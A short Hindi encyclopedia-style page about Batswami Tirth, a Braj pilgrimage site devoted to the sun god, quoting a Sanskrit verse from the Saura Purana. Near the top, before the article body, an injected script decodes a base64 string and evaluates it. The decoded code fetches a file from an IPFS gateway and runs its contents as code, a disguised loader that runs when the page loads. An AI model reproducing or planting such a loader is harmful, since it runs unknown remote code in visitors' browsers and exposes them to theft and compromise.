बटस्वामीतीर्थ

ब्रज डिस्कवरी, एक मुक्त ज्ञानकोष से
नेविगेशन पर जाएँ खोज पर जाएँ

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

बटस्वामी तीर्थ / Batswami Tirth

  • यहाँ भी सूर्यदेव भगवान् नारायण की आराधना करते हैं। सूर्यदेव ही एक नाम बटस्वामी भी है। रविवार के दिन इस तीर्थ में श्रद्धापूर्वक स्नान करने से मनुष्य आरोग्य एवं ऐश्वर्य लाभकर अन्त में परम गति को प्राप्त करता है।

तत: पर वटस्वामी तीर्थानां तीर्थमुत्तमम्।

वटस्वामीति विख्यातो यत्र देवो दिवाकर:।।
तत्तीर्थं चैव यो भक्त्या रविवारे निषेवते।

प्राप्नोत्यारोग्यमैश्वर्य्यमन्ते च गतिमुत्तमाम्।।[१]

टीका-टिपण्णी

  1. सौर पुराण

सम्बंधित लिंक